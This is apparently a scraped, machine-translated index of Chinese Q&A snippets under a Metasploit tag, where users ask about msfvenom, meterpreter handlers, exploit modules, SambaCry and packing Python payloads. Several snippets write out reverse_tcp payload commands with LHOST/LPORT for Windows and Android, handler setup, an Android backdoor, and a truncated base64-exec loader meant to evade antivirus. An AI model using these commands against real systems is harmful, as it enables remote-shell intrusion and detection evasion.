metasploit

    0热度

    1回答

    我试图创建一个使用msfvenom用下面的命令Metasploit的有效载荷拒绝的权限: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=3333 -f exe -o /Users/<UserNameHere>/Desktop > shell.exe 但是,在执行时,我收到了-bash: shell.exe:

    0热度

    1回答

    我一直试图在MS中加载一个新模块。我按照说明做了一个git克隆[文件地址]。然后,我将新文件复制到/root/.msf4/modules/exploits/windows/smb中,并复制到/ usr/share/metasploit-framework/modules/windows/smb中,然后发出reload_all并重新启动msfconsole,但仍然无论我尝试什么但它仍然说: msf

    0热度

    1回答

    我目前正在测试msfvenom android如何使用它的代码。那么我测试的AVD设备是扎根的,但后门没有root权限。我添加了这些代码,但仍然是一样的。为什么我没有root权限? Metepreter session's picture try { Process process = Runtime.getRuntime().exec("su"); pro

    0热度

    2回答

    我想每分钟自动运行metrpreter命令,不幸的是我没有足够的编程技巧来编写bash脚本或python。 比如我想自动做这些: msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST x.x.x.x set LPORT 443 exploit Meterpre

    1热度

    1回答

    我正在编写一个脚本来自动化met​​asploit,现在我的脚本工作正常,直到我需要在终端上运行的命令,但是当我尝试运行我必须在内部执行的命令时metasploit控制台脚本停止,直到我手动退出控制台,然后它将从下一行继续。 当您运行metasploit时,它将在您可以运行命令的终端内部打开一个控制台(msfconsole)。 如何在我的脚本中添加特定命令以在控制台内部运行? 这些是我想要运行的命

    -2热度

    1回答

    “错误:无效的格式选择” msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.43.4 lport=4444 -f apk -o /var/www/html/files.apk 我试图制作窗口的有效载荷,但它工作成功。 什么应该怎么办

    1热度

    1回答

    尽管它比较老,但在python中,您可以使用os.system()在终端中运行命令。 我的问题是,如果您输入metasploit使用msfconsole,请执行os.system()调用将命令输入到msfconsole中?

    0热度

    1回答

    我对Msfvenom格式类型有疑问。 msfvenom --help-formats Executable formats asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, jsp, loop-vbs, macho, msi, msi-nouac

    0热度

    1回答

    我试图利用linux内核漏洞samba cry(CVE-2017-7494)进行一些使用metasploit框架的研究工作。但我得到以下错误MSF开发(is_known_pipename)>运行 [*] Started reverse TCP handler on 192.168.78.136:4444 [*] 192.168.78.139:445 - Using location \\192.

    -2热度

    1回答

    我正在编译一个python代码在kali。这些是PyInstaller的以下设置: pyinstaller -F /root/Desktop/Evil_private.py -i Evil_Private.exe 并且代码只是用来避免反病毒检测的一些注释。以下代码是: import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes